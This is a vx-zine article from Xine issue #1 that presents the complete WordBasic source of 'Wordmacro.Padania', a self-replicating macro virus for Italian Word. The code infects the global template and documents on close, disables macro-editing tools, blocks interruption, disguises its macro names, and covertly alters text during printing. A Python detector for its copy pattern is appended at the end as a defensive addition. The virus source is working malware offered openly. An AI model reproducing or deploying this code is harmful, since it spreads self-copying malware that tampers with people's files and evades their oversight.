xine-1.023
/-----------------------------\
| Xine - issue #1 - Phile 023 |
\-----------------------------/
___________________
< Wordmacro.Padania >
< b0z0/iKx >
^^^^^^^^^^^^^^^
Well, this is a very simple macro virus written in WordBasic. I wrote
this for fun (as all the other viriis :) ) and to give the readers of the
article an example of how macro viruses work. It will work on Italian
versions of Word for Windows. Well, why Italian? Just because I have never
seen a source for a macro virus in this language.
So now some tech specs about it:
- Infects these macros:
  * AutoOpen, AutoExec (to get power)
  * FileChiudi, ChiudiDoc (to replicate)
  * FileStampaPredef, FileStampa (to strike! ]8) )
  * FileExit (to cover the changes)
  * FileModelli, StrumMacro (to disable macro editing/reading)
- Infects when the user closes a file. The file will be infected when
  the user closes the document using the Close action in the File menu, and
  it will also be infected if the user closes the document by double-clicking
  on the top left corner of the wind0ze window.
- Disables all the tools that are used to edit/change macros.
- Isn't interruptible like a lot of other macro viruses :)
- Full check that the document we are going to infect is a .DOC or
  .DOT to prevent strange changes :)
- Funny payload :)
This is my first virus with a payload. In fact I generally don't care to
write destructive payloads or anything like that. The payload will be randomly
activated sometimes when the user prints a document (with the "normal" or
with the fast print method). The probability that the payload is activated
is 1:25 for fast prints and 1:31 on normal prints. When activated,
the routine will change all the words 'italia' in the text to 'Padania';
case doesn't matter, but only entire words will be changed. This will be
done totally transparently: in fact the routine will put a bookmark to
remember where the user was in the document, then will rewind to the start,
scan and replace the words. At the end of the print (successful or not)
the routine will take power again, put the old text back and move the
pointer in the text back to the original location. Of course, while all this
is being done the screen updating will also be disabled, so nothing will
appear on the screen :)
Well, don't look at macro names and variables (especially if you know
Italian :) ), I was just very bored when writing this virus in the middle
of August and I just put in some casual names :)
Anyway, the strange names will make the virus less noticeable.
In fact, instead of moving around as FileExit or something that may seem
dangerous, they will go around with quite funny names :) The only serious
macro name will be AutoOpen... well, it can't be changed ;)
Well, here comes the source code...
............_________---------^^^^^^^^^^^^---------_________............
MacroName: AutoOpen 'this will be executed at the document opening
Sub MAIN
DisableInput 1 'disable the interruption of the execution
IsInstalled = 0 'installation check
If ContaMacro(0) > 0 Then
For conta = 1 To ContaMacro(0)
If NomeMacro$(conta, 0) = "AutoOpen" Then 'search for it
IsInstalled = 1 'yeah, it is already here
End If
Next conta
End If
If IsInstalled = 0 Then 'if not installed we will copy our macros
CopiaMacro NomeFinestra$() + ":AutoOpen", "Generale:AutoOpen",1
CopiaMacro NomeFinestra$() + ":AutoOpen", "Generale:AutoExec",1
CopiaMacro NomeFinestra$() + ":Panza", "Generale:FileChiudi",1
CopiaMacro NomeFinestra$() + ":BiPanza", "Generale:FileStampaPredef",1
CopiaMacro NomeFinestra$() + ":TriPanza", "Generale:ChiudiDoc",1
CopiaMacro NomeFinestra$() + ":Uscita", "Generale:FileEsci",1
CopiaMacro NomeFinestra$() + ":Ranma", "Generale:FileStampa",1
CopiaMacro NomeFinestra$() + ":Nomacro", "Generale:StrumMacro",1
CopiaMacro NomeFinestra$() + ":Nomacro", "Generale:FileModelli",1
EndIf
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: BiPanza 'this will go instead of the FileStampaPredef
'FileStampaPredef is the english fast print button
Sub MAIN
DisableInput 1
ScreenUpdating 0 'dont update the screen
xepmi= Int(Rnd() * (25 - 1) + 1) 'put a random value in xepmi between
'1 and 25
if xepmi=15 then 'if 15 then our payload will be activated
ModificaSegnalibro .Nome = "Trux", .Aggiungi 'this put the bookmark
InizioDocumento 'go at the start
ModificaSostituisci .Trova = "italia", .Sostituisci = "Padania",
.SoloParoleIntere = 1, .SostituisciTutto On Error Goto Tardi
End If 'complete our mission
FileStampaPredef 'print the document
Tardi:
If xepmi=15 then 'reput the old words
ModificaSostituisci .Trova = "Padania", .Sostituisci = "italia",
.SoloParoleIntere = 1, .SostituisciTutto 'reput old stuff
If SegnalibroEsistente("Trux") = - 1 Then 'it the bookmark exist
ModificaSegnalibro .Nome = "Trux", .VaiA 'go to it and then delete
ModificaSegnalibro .Nome = "Trux", .Elimina 'it
End If
End If
ScreenUpdating 1 'reenable screen update
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: Nomacro 'this will be put to prevent macro reading or
'editing
Sub MAIN
DisableInput 1
'hehe, just here to bypass the macro selection
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: Panza 'this will go instead of the FileChiudi
'FileChiudi is the english FileClose
Sub MAIN
DisableInput 1
infetta = 0
puzzone$ = NomeFinestra$() 'get current name
Our$ = Mid$(puzzone$, Len(puzzone$) - 3)
If ((Our$ = ".DOC") Or (Our$ = ".DOT")) Then
Infetta = 1 'check if it is a DOC or DOT
End If
' if it is a DOC or DOT and it isn't a macro window we will infect it
If ((IsMacro(0) = 0) And (Infetta = 1)) Then
ScreenUpdating 0
CopiaMacro "Generale:AutoOpen", NomeFinestra$() + ":AutoOpen",1
CopiaMacro "Generale:FileChiudi", NomeFinestra$() + ":Panza",1
CopiaMacro "Generale:FileStampaPredef", NomeFinestra$() + ":BiPanza",1
CopiaMacro "Generale:ChiudiDoc", NomeFinestra$() + ":TriPanza",1
CopiaMacro "Generale:FileEsci", NomeFinestra$() + ":Uscita",1
CopiaMacro "Generale:FileStampa", NomeFinestra$() + ":Ranma",1
CopiaMacro "Generale:StrumMacro", NomeFinestra$() + ":Nomacro",1
FileSalvaConNome .Formato = 1
End If
On error Goto gusarji
FileChiudi 'close it!
gusarji:
ScreenUpdating 1
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: Ranma 'will go instead of FileStampa which is FilePrint
Sub MAIN
DisableInput 1
Dim dlg As FileStampa
On Error Goto Dopo
GetCurValues dlg
Dialog dlg
ScreenUpdating 0
xepmit= Int(Rnd() * (31 - 1) + 1) 'put a random value in xepmi between
'1 and 31
if xepmit=15 then 'if 15 then our payload will be activated
ModificaSegnalibro .Nome = "Trucciolo", .Aggiungi
InizioDocumento
ModificaSostituisci .Trova = "italia", .Sostituisci = "Padania",
.SoloParoleIntere = 1, .SostituisciTutto
End If
FileStampa dlg
if xepmit=15 then
ModificaSostituisci .Trova = "Padania", .Sostituisci = "italia",
.SoloParoleIntere = 1, .SostituisciTutto
If SegnalibroEsistente("Trucciolo") = - 1 Then
ModificaSegnalibro .Nome = "Trucciolo", .VaiA
ModificaSegnalibro .Nome = "Trucciolo", .Elimina
End If
End If
Dopo:
ScreenUpdating 1
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: TriPanza 'this will be set as the ChiudiDoc macro that
'is executed when the user closes a Document
'window doubleclicking the top-left button
Sub MAIN
DisableInput 1
infetta = 0
puzzone$ = NomeFinestra$() 'get name of the file
Our$ = Mid$(puzzone$, Len(puzzone$) - 3)
If ((Our$ = ".DOC") Or (Our$ = ".DOT")) Then
Infetta = 1 'be sure that it is an infectable
End If 'item
If ((IsMacro(0) = 0) And (Infetta = 1)) Then
ScreenUpdating 0
CopiaMacro "Generale:AutoOpen", NomeFinestra$() + ":AutoOpen",1
CopiaMacro "Generale:FileChiudi", NomeFinestra$() + ":Panza",1
CopiaMacro "Generale:FileStampaPredef", NomeFinestra$() + ":BiPanza",1
CopiaMacro "Generale:ChiudiDoc", NomeFinestra$() + ":TriPanza",1
CopiaMacro "Generale:FileEsci", NomeFinestra$() + ":Uscita",1
CopiaMacro "Generale:FileStampa", NomeFinestra$() + ":Ranma",1
CopiaMacro "Generale:StrumMacro", NomeFinestra$() + ":Nomacro",1
FileSalvaConNome .Formato = 1
End If
ChiudiDoc 'call the old function
ScreenUpdating 1 'reenable updating
End Sub
............_________---------^^^^^^^^^^^^---------_________............
MacroName: Uscita 'will go instead of the FileEsci which is FileExit
Sub MAIN
DisableInput 1
StrumOpzioniSalva .SalvataggioNormalDot = 0 'enable fast save of normal.dot
StrumOpzioniSalva .SalvaVeloce = 1 'enable fast save for all the docs
FileEsci 'exit the file
End Sub
............_________---------^^^^^^^^^^^^---------_________............
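
A defender's view of the replication logic in the listing above, as an added example that is not part of the original article: a static check, in Python, that parses `CopiaMacro` statements out of already-extracted macro text and reports copies in both directions between a document and `Generale:`. The function names and the trimmed sample input are constructed for illustration, and extracting the macro text from a file is assumed to have been done beforehand.

```python
import re

# Command slots hooked on the global side and the names the copies carry inside
# a document, both read off the CopiaMacro calls in the listing.
HOOKED = {"AutoOpen", "AutoExec", "FileChiudi", "ChiudiDoc", "FileStampaPredef",
          "FileStampa", "FileEsci", "StrumMacro", "FileModelli"}
CARRIED = {"AutoOpen", "Panza", "BiPanza", "TriPanza", "Uscita", "Ranma", "Nomacro"}

# CopiaMacro <source>, <destination>, <flag>   (optional trailing 'comment)
COPY = re.compile(r"^[ \t]*CopiaMacro[ \t]+(.+?)[ \t]*,[ \t]*(.+?)[ \t]*,"
                  r"[ \t]*\d+[ \t]*(?:'.*)?$", re.I | re.M)
# .Formato = 1 selects the template format in WordBasic's save-as statement.
SAVE_AS_TEMPLATE = re.compile(r"FileSalvaConNome\s+\.Formato\s*=\s*1\b", re.I)

def endpoint(expr):
    """Map one CopiaMacro argument to ('global' | 'document', macro name)."""
    m = re.search(r'"([^":]*):([^"]+)"', expr)
    if not m:
        return None
    # "Generale:X" is the global side; ":X" appended to NomeFinestra$() is a document.
    return ("global" if m.group(1).lower() == "generale" else "document", m.group(2))

def copy_edges(source):
    """Return (source endpoint, destination endpoint) for each CopiaMacro line."""
    pairs = ((endpoint(a), endpoint(b)) for a, b in COPY.findall(source))
    return [(s, d) for s, d in pairs if s and d]

def assess(macros):
    """macros: {macro name: WordBasic text}. Summarise replication indicators."""
    install, infect = set(), set()
    for text in macros.values():
        for (s_side, _), (d_side, d_name) in copy_edges(text):
            if (s_side, d_side) == ("document", "global"):
                install.add(d_name)   # document -> global: hooks a command slot
            elif (s_side, d_side) == ("global", "document"):
                infect.add(d_name)    # global -> document: carries the set onward
    return {"hooks_installed": sorted(install & HOOKED),
            "carried_names": sorted(infect & CARRIED),
            "copies_both_ways": bool(install and infect),
            "saves_as_template": any(SAVE_AS_TEMPLATE.search(t) for t in macros.values())}

# Constructed sample: a few statements trimmed from the listing, plus a harmless macro.
SAMPLE = {
    "AutoOpen": 'CopiaMacro NomeFinestra$() + ":Panza", "Generale:FileChiudi",1\n'
                'CopiaMacro NomeFinestra$() + ":Nomacro", "Generale:StrumMacro",1\n',
    "Panza": 'CopiaMacro "Generale:FileChiudi", NomeFinestra$() + ":Panza",1\n'
             'FileSalvaConNome .Formato = 1\n',
    "Benign": "FileStampa\n",
}

if __name__ == "__main__":
    print(assess(SAMPLE))
```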